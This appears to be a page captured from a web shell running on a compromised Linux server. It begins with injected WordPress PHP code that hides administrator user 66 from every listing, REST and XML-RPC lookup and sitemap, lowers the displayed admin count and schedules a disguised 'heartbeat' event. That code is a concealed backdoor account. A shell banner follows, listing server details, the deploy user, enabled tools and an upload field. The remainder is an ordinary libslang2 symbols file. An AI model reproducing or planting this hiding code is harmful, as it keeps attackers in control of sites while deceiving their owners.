add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
libslang.so.2 libslang2 #MINVER# SLANG2.1.0@SLANG2.1.0 2.2.4 SLANG2.1.1@SLANG2.1.1 2.2.4 SLANG2.2.0@SLANG2.2.0 2.2.4 SLANG2.2.1@SLANG2.2.1 2.2.4 SLANG2.2.3@SLANG2.2.3 2.2.4 SLANG2.3.0@SLANG2.3.0 2.3.0 SLANG2@SLANG2 2.2.4 SLKeyBoard_Quit@SLANG2 2.2.4 SLKeyMap_List_Root@SLANG2 2.2.4 SL_Any_Error@SLANG2 2.2.4 SL_Application_Error@SLANG2 2.2.4 SL_ArithOverflow_Error@SLANG2 2.2.4 SL_ArithUnderflow_Error@SLANG2 2.2.4 SL_Data_Error@SLANG2 2.2.4 SL_DivideByZero_Error@SLANG2 2.2.4 SL_Domain_Error@SLANG2 2.2.4 SL_DuplicateDefinition_Error@SLANG2 2.2.4 SL_Forbidden_Error@SLANG2 2.2.4 SL_IO_Error@SLANG2 2.2.4 SL_Import_Error@SLANG2 2.2.4 SL_Index_Error@SLANG2 2.2.4 SL_Internal_Error@SLANG2 2.2.4 SL_InvalidParm_Error@SLANG2 2.2.4 SL_InvalidUTF8_Error@SLANG2 2.2.4 SL_LimitExceeded_Error@SLANG2 2.2.4 SL_Malloc_Error@SLANG2 2.2.4 SL_Math_Error@SLANG2 2.2.4 SL_Namespace_Error@SLANG2 2.2.4 SL_NotImplemented_Error@SLANG2 2.2.4 SL_NumArgs_Error@SLANG2 2.2.4 SL_OS_Error@SLANG2 2.2.4 SL_Open_Error@SLANG2 2.2.4 SL_Parse_Error@SLANG2 2.2.4 SL_ReadOnly_Error@SLANG2 2.2.4 SL_Read_Error@SLANG2 2.2.4 SL_RunTime_Error@SLANG2 2.2.4 SL_StackOverflow_Error@SLANG2 2.2.4 SL_StackUnderflow_Error@SLANG2 2.2.4 SL_Stack_Error@SLANG2 2.2.4 SL_Syntax_Error@SLANG2 2.2.4 SL_TypeMismatch_Error@SLANG2 2.2.4 SL_UndefinedName_Error@SLANG2 2.2.4 SL_Unicode_Error@SLANG2 2.2.4 SL_Unknown_Error@SLANG2 2.2.4 SL_Usage_Error@SLANG2 2.2.4 SL_UserBreak_Error@SLANG2 2.2.4 SL_VariableUninitialized_Error@SLANG2 2.2.4 SL_Write_Error@SLANG2 2.2.4 SLadd_app_unary_table@SLANG2 2.2.4 SLadd_dconstant_table@SLANG2 2.2.4 SLadd_fconstant_table@SLANG2 2.2.4 SLadd_global_variable@SLANG2 2.2.4 SLadd_iconstant_table@SLANG2 2.2.4 SLadd_intrin_fun_table@SLANG2 2.2.4 SLadd_intrin_var_table@SLANG2 2.2.4 SLadd_intrinsic_function@SLANG2 2.2.4 SLadd_intrinsic_variable@SLANG2 2.2.4 SLadd_istruct_table@SLANG2 2.2.4 SLadd_lconstant_table@SLANG2.2.3 2.2.4 SLadd_llconstant_table@SLANG2 2.2.4 SLadd_math_unary_table@SLANG2 2.2.4 SLallocate_load_type@SLANG2 2.2.4 SLang_Abort_Char@SLANG2 2.2.4 SLang_Auto_Declare_Var_Hook@SLANG2 2.2.4 SLang_Doc_Dir@SLANG2 2.2.4 SLang_Dump_Routine@SLANG2 2.2.4 SLang_Enter_Function@SLANG2 2.2.4 SLang_Error_Hook@SLANG2 2.2.4 SLang_Exit_Error_Hook@SLANG2 2.2.4 SLang_Exit_Function@SLANG2 2.2.4 SLang_Ignore_User_Abort@SLANG2 2.2.4 SLang_Input_Buffer@SLANG2 2.2.4 SLang_Input_Buffer_Len@SLANG2 2.2.4 SLang_Interrupt@SLANG2 2.2.4 SLang_Key_TimeOut_Flag@SLANG2 2.2.4 SLang_Last_Key_Char@SLANG2 2.2.4 SLang_Load_File_Hook@SLANG2 2.2.4 SLang_Num_Function_Args@SLANG2 2.2.4 SLang_TT_Baud_Rate@SLANG2 2.2.4 SLang_TT_Read_FD@SLANG2 2.2.4 SLang_TT_Write_FD@SLANG2 2.2.4 SLang_Traceback@SLANG2 2.2.4 SLang_User_Clear_Error@SLANG2 2.2.4 SLang_User_Prompt@SLANG2 2.2.4 SLang_VMessage_Hook@SLANG2 2.2.4 SLang_Version@SLANG2 2.2.4 SLang_Version_String@SLANG2 2.2.4 SLang_add_cleanup_function@SLANG2 2.2.4 SLang_add_interrupt_hook@SLANG2 2.2.4 SLang_add_intrinsic_array@SLANG2 2.2.4 SLang_assign_cstruct_to_ref@SLANG2 2.2.4 SLang_assign_nametype_to_ref@SLANG2 2.2.4 SLang_assign_to_ref@SLANG2 2.2.4 SLang_assoc_get@SLANG2.3.0 2.3.0 SLang_assoc_key_exists@SLANG2.3.0 2.3.0 SLang_assoc_put@SLANG2.3.0 2.3.0 SLang_autoload@SLANG2 2.2.4 SLang_buffer_keystring@SLANG2 2.2.4 SLang_byte_compile_file@SLANG2 2.2.4 SLang_concat_slstrings@SLANG2 2.2.4 SLang_copy_function@SLANG2 2.2.4 SLang_create_array1@SLANG2 2.2.4 SLang_create_array@SLANG2 2.2.4 SLang_create_assoc@SLANG2.3.0 2.3.0 SLang_create_keymap@SLANG2 2.2.4 SLang_create_list@SLANG2.3.0 2.3.0 SLang_create_mmt@SLANG2 2.2.4 SLang_create_nslstring@SLANG2 2.2.4 SLang_create_slstring@SLANG2 2.2.4 SLang_create_struct@SLANG2.3.0 2.3.0 SLang_define_case@SLANG2 2.2.4 SLang_define_key@SLANG2 2.2.4 SLang_do_key@SLANG2 2.2.4 SLang_duplicate_array@SLANG2 2.2.4 SLang_end_arg_list@SLANG2 2.2.4 SLang_execute_function@SLANG2 2.2.4 SLang_exit_error@SLANG2 2.2.4 SLang_find_key_function@SLANG2 2.2.4 SLang_find_keymap@SLANG2 2.2.4 SLang_flush_input@SLANG2 2.2.4 SLang_free_anytype@SLANG2 2.2.4 SLang_free_array@SLANG2 2.2.4 SLang_free_assoc@SLANG2.3.0 2.3.0 SLang_free_cstruct@SLANG2 2.2.4 SLang_free_function@SLANG2 2.2.4 SLang_free_list@SLANG2.3.0 2.3.0 SLang_free_mmt@SLANG2 2.2.4 SLang_free_object@SLANG2 2.2.4 SLang_free_ref@SLANG2 2.2.4 SLang_free_slstring@SLANG2 2.2.4 SLang_free_struct@SLANG2 2.2.4 SLang_free_value@SLANG2 2.2.4 SLang_generate_debug_info@SLANG2 2.2.4 SLang_get_array_element@SLANG2 2.2.4 SLang_get_double_qualifier@SLANG2.3.0 2.3.0 SLang_get_error@SLANG2 2.2.4 SLang_get_fileptr@SLANG2 2.2.4 SLang_get_fun_from_ref@SLANG2 2.2.4 SLang_get_function@SLANG2 2.2.4 SLang_get_int_qualifier@SLANG2.3.0 2.3.0 SLang_get_int_size@SLANG2 2.2.4 SLang_get_int_type@SLANG2 2.2.4 SLang_get_long_qualifier@SLANG2.3.0 2.3.0 SLang_get_name_from_fileptr@SLANG2 2.2.4 SLang_get_string_qualifier@SLANG2.3.0 2.3.0 SLang_getkey@SLANG2 2.2.4 SLang_getkey_intr_hook@SLANG2 2.2.4 SLang_guess_type@SLANG2 2.2.4 SLang_handle_interrupt@SLANG2 2.2.4 SLang_inc_mmt@SLANG2 2.2.4 SLang_init_all@SLANG2 2.2.4 SLang_init_array@SLANG2 2.2.4 SLang_init_array_extra@SLANG2 2.2.4 SLang_init_case_tables@SLANG2 2.2.4 SLang_init_import@SLANG2 2.2.4 SLang_init_ospath@SLANG2 2.2.4 SLang_init_posix_dir@SLANG2 2.2.4 SLang_init_posix_io@SLANG2 2.2.4 SLang_init_posix_process@SLANG2 2.2.4 SLang_init_signal@SLANG2 2.2.4 SLang_init_slang@SLANG2 2.2.4 SLang_init_slassoc@SLANG2 2.2.4 SLang_init_slfile@SLANG2 2.2.4 SLang_init_slmath@SLANG2 2.2.4 SLang_init_slunix@SLANG2 2.2.4 SLang_init_stdio@SLANG2 2.2.4 SLang_init_tty@SLANG2 2.2.4 SLang_input_pending@SLANG2 2.2.4 SLang_is_defined@SLANG2 2.2.4 SLang_list_append@SLANG2.3.0 2.3.0 SLang_list_insert@SLANG2.3.0 2.3.0 SLang_load_file@SLANG2 2.2.4 SLang_load_file_verbose@SLANG2 2.2.4 SLang_load_object@SLANG2 2.2.4 SLang_load_string@SLANG2 2.2.4 SLang_make_keystring@SLANG2 2.2.4 SLang_object_from_mmt@SLANG2 2.2.4 SLang_peek_at_stack1@SLANG2 2.2.4 SLang_peek_at_stack1_n@SLANG2 2.2.4 SLang_peek_at_stack@SLANG2 2.2.4 SLang_peek_at_stack_n@SLANG2 2.2.4 SLang_pop@SLANG2 2.2.4 SLang_pop_anytype@SLANG2 2.2.4 SLang_pop_array@SLANG2 2.2.4 SLang_pop_array_index@SLANG2.1.1 2.2.4 SLang_pop_array_of_type@SLANG2 2.2.4 SLang_pop_assoc@SLANG2.3.0 2.3.0 SLang_pop_bstring@SLANG2 2.2.4 SLang_pop_char@SLANG2 2.2.4 SLang_pop_complex@SLANG2 2.2.4 SLang_pop_cstruct@SLANG2 2.2.4 SLang_pop_datatype@SLANG2 2.2.4 SLang_pop_double@SLANG2 2.2.4 SLang_pop_fileptr@SLANG2 2.2.4 SLang_pop_float@SLANG2 2.2.4 SLang_pop_function@SLANG2 2.2.4 SLang_pop_int@SLANG2 2.2.4 SLang_pop_list@SLANG2.3.0 2.3.0 SLang_pop_long@SLANG2 2.2.4 SLang_pop_long_long@SLANG2 2.2.4 SLang_pop_mmt@SLANG2 2.2.4 SLang_pop_null@SLANG2 2.2.4 SLang_pop_ref@SLANG2 2.2.4 SLang_pop_short@SLANG2 2.2.4 SLang_pop_slstring@SLANG2 2.2.4 SLang_pop_strlen_type@SLANG2.2.3 2.2.4 SLang_pop_struct@SLANG2 2.2.4 SLang_pop_struct_field@SLANG2.3.0 2.3.0 SLang_pop_struct_fields@SLANG2.3.0 2.3.0 SLang_pop_uchar@SLANG2 2.2.4 SLang_pop_uint@SLANG2 2.2.4 SLang_pop_ulong@SLANG2 2.2.4 SLang_pop_ulong_long@SLANG2 2.2.4 SLang_pop_ushort@SLANG2 2.2.4 SLang_pop_value@SLANG2 2.2.4 SLang_process_keystring@SLANG2 2.2.4 SLang_push@SLANG2 2.2.4 SLang_push_anytype@SLANG2 2.2.4 SLang_push_array@SLANG2 2.2.4 SLang_push_array_index@SLANG2.2.3 2.2.4 SLang_push_assoc@SLANG2.3.0 2.3.0 SLang_push_bstring@SLANG2 2.2.4 SLang_push_char@SLANG2 2.2.4 SLang_push_complex@SLANG2 2.2.4 SLang_push_cstruct@SLANG2 2.2.4 SLang_push_datatype@SLANG2 2.2.4 SLang_push_double@SLANG2 2.2.4 SLang_push_float@SLANG2 2.2.4 SLang_push_function@SLANG2 2.2.4 SLang_push_int@SLANG2 2.2.4 SLang_push_list@SLANG2.3.0 2.3.0 SLang_push_long@SLANG2 2.2.4 SLang_push_long_long@SLANG2 2.2.4 SLang_push_malloced_string@SLANG2 2.2.4 SLang_push_mmt@SLANG2 2.2.4 SLang_push_null@SLANG2 2.2.4 SLang_push_ref@SLANG2.1.0 2.2.4 SLang_push_short@SLANG2 2.2.4 SLang_push_string@SLANG2 2.2.4 SLang_push_strlen_type@SLANG2.2.3 2.2.4 SLang_push_struct@SLANG2 2.2.4 SLang_push_struct_field@SLANG2.3.0 2.3.0 SLang_push_uchar@SLANG2 2.2.4 SLang_push_uint@SLANG2 2.2.4 SLang_push_ulong@SLANG2 2.2.4 SLang_push_ulong_long@SLANG2 2.2.4 SLang_push_ushort@SLANG2 2.2.4 SLang_push_value@SLANG2 2.2.4 SLang_qualifier_exists@SLANG2.3.0 2.3.0 SLang_remove_interrupt_hook@SLANG2 2.2.4 SLang_reset_tty@SLANG2 2.2.4 SLang_restart@SLANG2 2.2.4 SLang_run_hooks@SLANG2 2.2.4 SLang_set_abort_signal@SLANG2 2.2.4 SLang_set_argc_argv@SLANG2 2.2.4 SLang_set_array_element@SLANG2 2.2.4 SLang_set_error@SLANG2 2.2.4 SLang_set_module_load_path@SLANG2 2.2.4 SLang_start_arg_list@SLANG2 2.2.4 SLang_undefine_key@SLANG2 2.2.4 SLang_ungetkey@SLANG2 2.2.4 SLang_ungetkey_string@SLANG2 2.2.4 SLang_verror@SLANG2 2.2.4 SLang_verror_va@SLANG2.1.0 2.2.4 SLang_vmessage@SLANG2 2.2.4 SLarith_get_to_double_fun@SLANG2 2.2.4 SLarray_contract_array@SLANG2 2.2.4 SLarray_map_array@SLANG2 2.2.4 SLarray_map_array_1@SLANG2 2.2.4 SLatoi@SLANG2 2.2.4 SLatol@SLANG2 2.2.4 SLatoll@SLANG2 2.2.4 SLatoul@SLANG2 2.2.4 SLatoull@SLANG2 2.2.4 SLbstring_create@SLANG2 2.2.4 SLbstring_create_malloced@SLANG2 2.2.4 SLbstring_create_slstring@SLANG2 2.2.4 SLbstring_dup@SLANG2 2.2.4 SLbstring_free@SLANG2 2.2.4 SLbstring_get_pointer@SLANG2 2.2.4 SLcalloc@SLANG2 2.2.4 SLclass_add_app_unary_op@SLANG2 2.2.4 SLclass_add_binary_op@SLANG2 2.2.4 SLclass_add_math_op@SLANG2 2.2.4 SLclass_add_typecast@SLANG2 2.2.4 SLclass_add_unary_op@SLANG2 2.2.4 SLclass_allocate_class@SLANG2 2.2.4 SLclass_create_synonym@SLANG2 2.2.4 SLclass_dup_object@SLANG2 2.2.4 SLclass_get_class_id@SLANG2 2.2.4 SLclass_get_datatype_name@SLANG2 2.2.4 SLclass_is_class_defined@SLANG2 2.2.4 SLclass_patch_intrin_fun_table1@SLANG2.1.0 2.2.4 SLclass_patch_intrin_fun_table@SLANG2.1.0 2.2.4 SLclass_pop_char_obj@SLANG2 2.2.4 SLclass_pop_double_obj@SLANG2 2.2.4 SLclass_pop_float_obj@SLANG2 2.2.4 SLclass_pop_int_obj@SLANG2 2.2.4 SLclass_pop_long_obj@SLANG2 2.2.4 SLclass_pop_ptr_obj@SLANG2 2.2.4 SLclass_pop_short_obj@SLANG2 2.2.4 SLclass_push_char_obj@SLANG2 2.2.4 SLclass_push_double_obj@SLANG2 2.2.4 SLclass_push_float_obj@SLANG2 2.2.4 SLclass_push_int_obj@SLANG2 2.2.4 SLclass_push_llong_obj@SLANG2 2.2.4 SLclass_push_long_obj@SLANG2 2.2.4 SLclass_push_ptr_obj@SLANG2 2.2.4 SLclass_push_short_obj@SLANG2 2.2.4 SLclass_register_class@SLANG2 2.2.4 SLclass_set_acopy_function@SLANG2 2.2.4 SLclass_set_aelem_init_function@SLANG2.2.1 2.2.4 SLclass_set_aget_function@SLANG2 2.2.4 SLclass_set_anew_function@SLANG2 2.2.4 SLclass_set_apush_function@SLANG2 2.2.4 SLclass_set_aput_function@SLANG2 2.2.4 SLclass_set_deref_function@SLANG2 2.2.4 SLclass_set_destroy_function@SLANG2 2.2.4 SLclass_set_eqs_function@SLANG2 2.2.4 SLclass_set_foreach_functions@SLANG2 2.2.4 SLclass_set_is_container@SLANG2 2.2.4 SLclass_set_length_function@SLANG2 2.2.4 SLclass_set_pop_function@SLANG2 2.2.4 SLclass_set_push_function@SLANG2 2.2.4 SLclass_set_sget_function@SLANG2 2.2.4 SLclass_set_sput_function@SLANG2 2.2.4 SLclass_set_string_function@SLANG2 2.2.4 SLclass_typecast@SLANG2 2.2.4 SLcmd_execute_string@SLANG2 2.2.4 SLcomplex_abs@SLANG2 2.2.4 SLcomplex_acos@SLANG2 2.2.4 SLcomplex_acosh@SLANG2 2.2.4 SLcomplex_asin@SLANG2 2.2.4 SLcomplex_asinh@SLANG2 2.2.4 SLcomplex_atan@SLANG2 2.2.4 SLcomplex_atanh@SLANG2 2.2.4 SLcomplex_cos@SLANG2 2.2.4 SLcomplex_cosh@SLANG2 2.2.4 SLcomplex_divide@SLANG2 2.2.4 SLcomplex_exp@SLANG2 2.2.4 SLcomplex_log10@SLANG2 2.2.4 SLcomplex_log@SLANG2 2.2.4 SLcomplex_pow@SLANG2 2.2.4 SLcomplex_sin@SLANG2 2.2.4 SLcomplex_sinh@SLANG2 2.2.4 SLcomplex_sqrt@SLANG2 2.2.4 SLcomplex_tan@SLANG2 2.2.4 SLcomplex_tanh@SLANG2 2.2.4 SLcomplex_times@SLANG2 2.2.4 SLcompute_string_hash@SLANG2.3.0 2.3.0 SLcurrent_time_string@SLANG2 2.2.4 SLcurses_Acs_Map@SLANG2 2.2.4 SLcurses_Esc_Delay@SLANG2 2.2.4 SLcurses_Is_Endwin@SLANG2 2.2.4 SLcurses_Num_Colors@SLANG2 2.2.4 SLcurses_Stdscr@SLANG2 2.2.4 SLcurses_cbreak@SLANG2 2.2.4 SLcurses_clearok@SLANG2 2.2.4 SLcurses_delwin@SLANG2 2.2.4 SLcurses_endwin@SLANG2 2.2.4 SLcurses_getch@SLANG2 2.2.4 SLcurses_has_colors@SLANG2 2.2.4 SLcurses_initscr@SLANG2 2.2.4 SLcurses_mvprintw@SLANG2 2.2.4 SLcurses_mvwprintw@SLANG2 2.2.4 SLcurses_newwin@SLANG2 2.2.4 SLcurses_nil@SLANG2 2.2.4 SLcurses_nodelay@SLANG2 2.2.4 SLcurses_printw@SLANG2 2.2.4 SLcurses_raw@SLANG2 2.2.4 SLcurses_start_color@SLANG2 2.2.4 SLcurses_subwin@SLANG2 2.2.4 SLcurses_waddch@SLANG2 2.2.4 SLcurses_waddnstr@SLANG2 2.2.4 SLcurses_wattroff@SLANG2 2.2.4 SLcurses_wattron@SLANG2 2.2.4 SLcurses_wattrset@SLANG2 2.2.4 SLcurses_wclear@SLANG2 2.2.4 SLcurses_wclrtobot@SLANG2 2.2.4 SLcurses_wclrtoeol@SLANG2 2.2.4 SLcurses_wdelch@SLANG2 2.2.4 SLcurses_wgetch@SLANG2 2.2.4 SLcurses_winsch@SLANG2 2.2.4 SLcurses_wmove@SLANG2 2.2.4 SLcurses_wnoutrefresh@SLANG2 2.2.4 SLcurses_wprintw@SLANG2 2.2.4 SLcurses_wrefresh@SLANG2 2.2.4 SLcurses_wscrl@SLANG2 2.2.4 SLdeallocate_load_type@SLANG2 2.2.4 SLdebug_calloc@SLANG2 2.2.4 SLdebug_free@SLANG2 2.2.4 SLdebug_malloc@SLANG2 2.2.4 SLdebug_realloc@SLANG2 2.2.4 SLdefine_for_ifdef@SLANG2 2.2.4 SLdo_pop@SLANG2 2.2.4 SLdo_pop_n@SLANG2 2.2.4 SLdup_n@SLANG2 2.2.4 SLerr_exception_eqs@SLANG2 2.2.4 SLerr_new_exception@SLANG2 2.2.4 SLerr_strerror@SLANG2 2.2.4 SLerr_throw@SLANG2.1.0 2.2.4 SLerrno_set_errno@SLANG2 2.2.4 SLerrno_strerror@SLANG2 2.2.4 SLexecute_function@SLANG2 2.2.4 SLexpand_escaped_string@SLANG2 2.2.4 SLextract_list_element@SLANG2 2.2.4 SLfile_create_clientdata_id@SLANG2 2.2.4 SLfile_create_fd@SLANG2 2.2.4 SLfile_dup_fd@SLANG2 2.2.4 SLfile_free_fd@SLANG2 2.2.4 SLfile_get_clientdata@SLANG2 2.2.4 SLfile_get_fd@SLANG2 2.2.4 SLfile_pop_fd@SLANG2 2.2.4 SLfile_push_fd@SLANG2 2.2.4 SLfile_set_clientdata@SLANG2 2.2.4 SLfile_set_close_method@SLANG2 2.2.4 SLfile_set_dup_method@SLANG2 2.2.4 SLfile_set_getfd_method@SLANG2 2.2.4 SLfile_set_read_method@SLANG2 2.2.4 SLfile_set_write_method@SLANG2 2.2.4 SLfpu_clear_except_bits@SLANG2 2.2.4 SLfpu_test_except_bits@SLANG2 2.2.4 SLfree@SLANG2 2.2.4 SLinterp_is_utf8_mode@SLANG2 2.2.4 SLinterp_utf8_enable@SLANG2 2.2.4 SLkm_define_key@SLANG2 2.2.4 SLkm_define_keysym@SLANG2 2.2.4 SLkm_define_slkey@SLANG2 2.2.4 SLkm_set_free_method@SLANG2 2.2.4 SLkp_define_keysym@SLANG2 2.2.4 SLkp_getkey@SLANG2 2.2.4 SLkp_init@SLANG2 2.2.4 SLkp_set_getkey_function@SLANG2 2.2.4 SLmake_lut@SLANG2 2.2.4 SLmake_nstring@SLANG2 2.2.4 SLmake_string@SLANG2 2.2.4 SLmalloc@SLANG2 2.2.4 SLmalloc_dump_statistics@SLANG2 2.2.4 SLmath_hypot@SLANG2 2.2.4 SLmemchr@SLANG2 2.2.4 SLmemcmp@SLANG2 2.2.4 SLmemcpy@SLANG2 2.2.4 SLmemset@SLANG2 2.2.4 SLns_Load_File_Hook@SLANG2 2.2.4 SLns_add_app_unary_table@SLANG2 2.2.4 SLns_add_dconstant@SLANG2 2.2.4 SLns_add_dconstant_table@SLANG2 2.2.4 SLns_add_fconstant@SLANG2 2.2.4 SLns_add_hconstant@SLANG2 2.2.4 SLns_add_hconstant_table@SLANG2 2.2.4 SLns_add_iconstant@SLANG2 2.2.4 SLns_add_iconstant_table@SLANG2 2.2.4 SLns_add_intrin_fun_table@SLANG2 2.2.4 SLns_add_intrin_var_table@SLANG2 2.2.4 SLns_add_intrinsic_function@SLANG2 2.2.4 SLns_add_intrinsic_variable@SLANG2 2.2.4 SLns_add_istruct_table@SLANG2 2.2.4 SLns_add_lconstant@SLANG2 2.2.4 SLns_add_lconstant_table@SLANG2 2.2.4 SLns_add_llconstant@SLANG2 2.2.4 SLns_add_math_unary_table@SLANG2 2.2.4 SLns_allocate_load_type@SLANG2 2.2.4 SLns_create_namespace@SLANG2 2.2.4 SLns_delete_namespace@SLANG2 2.2.4 SLns_load_file@SLANG2 2.2.4 SLns_load_string@SLANG2 2.2.4 SLpath_basename@SLANG2 2.2.4 SLpath_dircat@SLANG2 2.2.4 SLpath_dirname@SLANG2 2.2.4 SLpath_extname@SLANG2 2.2.4 SLpath_file_exists@SLANG2 2.2.4 SLpath_find_file_in_path@SLANG2 2.2.4 SLpath_get_delimiter@SLANG2 2.2.4 SLpath_get_load_path@SLANG2 2.2.4 SLpath_getcwd@SLANG2.3.0 2.3.0 SLpath_is_absolute_path@SLANG2 2.2.4 SLpath_pathname_sans_extname@SLANG2 2.2.4 SLpath_set_delimiter@SLANG2 2.2.4 SLpath_set_load_path@SLANG2 2.2.4 SLpop_string@SLANG2 2.2.4 SLprep_delete@SLANG2 2.2.4 SLprep_exists_hook@SLANG2 2.2.4 SLprep_line_ok@SLANG2 2.2.4 SLprep_new@SLANG2 2.2.4 SLprep_set_comment@SLANG2 2.2.4 SLprep_set_eval_hook@SLANG2 2.2.4 SLprep_set_exists_hook@SLANG2 2.2.4 SLprep_set_flags@SLANG2 2.2.4 SLprep_set_prefix@SLANG2 2.2.4 SLrealloc@SLANG2 2.2.4 SLregexp_compile@SLANG2 2.2.4 SLregexp_free@SLANG2 2.2.4 SLregexp_get_hints@SLANG2 2.2.4 SLregexp_match@SLANG2 2.2.4 SLregexp_nth_match@SLANG2 2.2.4 SLregexp_quote_string@SLANG2 2.2.4 SLreverse_stack@SLANG2 2.2.4 SLrline_add_to_history@SLANG2 2.2.4 SLrline_bol@SLANG2.1.0 2.2.4 SLrline_close@SLANG2 2.2.4 SLrline_del@SLANG2 2.2.4 SLrline_eol@SLANG2.1.0 2.2.4 SLrline_get_echo@SLANG2 2.2.4 SLrline_get_hscroll@SLANG2 2.2.4 SLrline_get_keymap@SLANG2 2.2.4 SLrline_get_line@SLANG2 2.2.4 SLrline_get_point@SLANG2 2.2.4 SLrline_get_tab@SLANG2 2.2.4 SLrline_get_update_client_data@SLANG2.3.0 2.3.0 SLrline_init@SLANG2.1.0 2.2.4 SLrline_ins@SLANG2 2.2.4 SLrline_move@SLANG2.1.0 2.2.4 SLrline_open2@SLANG2.1.0 2.2.4 SLrline_open@SLANG2 2.2.4 SLrline_read_line@SLANG2 2.2.4 SLrline_redraw@SLANG2 2.2.4 SLrline_save_line@SLANG2 2.2.4 SLrline_set_display_width@SLANG2 2.2.4 SLrline_set_echo@SLANG2 2.2.4 SLrline_set_free_update_cb@SLANG2.3.0 2.3.0 SLrline_set_hscroll@SLANG2 2.2.4 SLrline_set_line@SLANG2 2.2.4 SLrline_set_point@SLANG2 2.2.4 SLrline_set_tab@SLANG2 2.2.4 SLrline_set_update_clear_cb@SLANG2.3.0 2.3.0 SLrline_set_update_hook@SLANG2 2.2.4 SLrline_set_update_postread_cb@SLANG2.3.0 2.3.0 SLrline_set_update_preread_cb@SLANG2.3.0 2.3.0 SLrline_set_update_width_cb@SLANG2.3.0 2.3.0 SLroll_stack@SLANG2 2.2.4 SLscroll_find_line_num@SLANG2 2.2.4 SLscroll_find_top@SLANG2 2.2.4 SLscroll_next_n@SLANG2 2.2.4 SLscroll_pagedown@SLANG2 2.2.4 SLscroll_pageup@SLANG2 2.2.4 SLscroll_prev_n@SLANG2 2.2.4 SLsearch_backward@SLANG2 2.2.4 SLsearch_delete@SLANG2 2.2.4 SLsearch_forward@SLANG2 2.2.4 SLsearch_match_len@SLANG2 2.2.4 SLsearch_new@SLANG2 2.2.4 SLsig_block_signals@SLANG2 2.2.4 SLsig_forbid_signal@SLANG2 2.2.4 SLsig_unblock_signals@SLANG2 2.2.4 SLsignal@SLANG2 2.2.4 SLsignal_intr@SLANG2 2.2.4 SLsmg_Backspace_Moves@SLANG2 2.2.4 SLsmg_Display_Eight_Bit@SLANG2 2.2.4 SLsmg_Newline_Behavior@SLANG2 2.2.4 SLsmg_Scroll_Hash_Border@SLANG2 2.2.4 SLsmg_Tab_Width@SLANG2 2.2.4 SLsmg_char_at@SLANG2 2.2.4 SLsmg_cls@SLANG2 2.2.4 SLsmg_draw_box@SLANG2 2.2.4 SLsmg_draw_hline@SLANG2 2.2.4 SLsmg_draw_object@SLANG2 2.2.4 SLsmg_draw_vline@SLANG2 2.2.4 SLsmg_embedded_escape_mode@SLANG2 2.2.4 SLsmg_erase_eol@SLANG2 2.2.4 SLsmg_erase_eos@SLANG2 2.2.4 SLsmg_fill_region@SLANG2 2.2.4 SLsmg_forward@SLANG2 2.2.4 SLsmg_get_column@SLANG2 2.2.4 SLsmg_get_row@SLANG2 2.2.4 SLsmg_gotorc@SLANG2 2.2.4 SLsmg_init_smg@SLANG2 2.2.4 SLsmg_is_utf8_mode@SLANG2 2.2.4 SLsmg_normal_video@SLANG2 2.2.4 SLsmg_printf@SLANG2 2.2.4 SLsmg_read_raw@SLANG2 2.2.4 SLsmg_refresh@SLANG2 2.2.4 SLsmg_reinit_smg@SLANG2 2.2.4 SLsmg_reset_smg@SLANG2 2.2.4 SLsmg_resume_smg@SLANG2 2.2.4 SLsmg_reverse_video@SLANG2 2.2.4 SLsmg_set_char_set@SLANG2 2.2.4 SLsmg_set_color@SLANG2 2.2.4 SLsmg_set_color_in_region@SLANG2 2.2.4 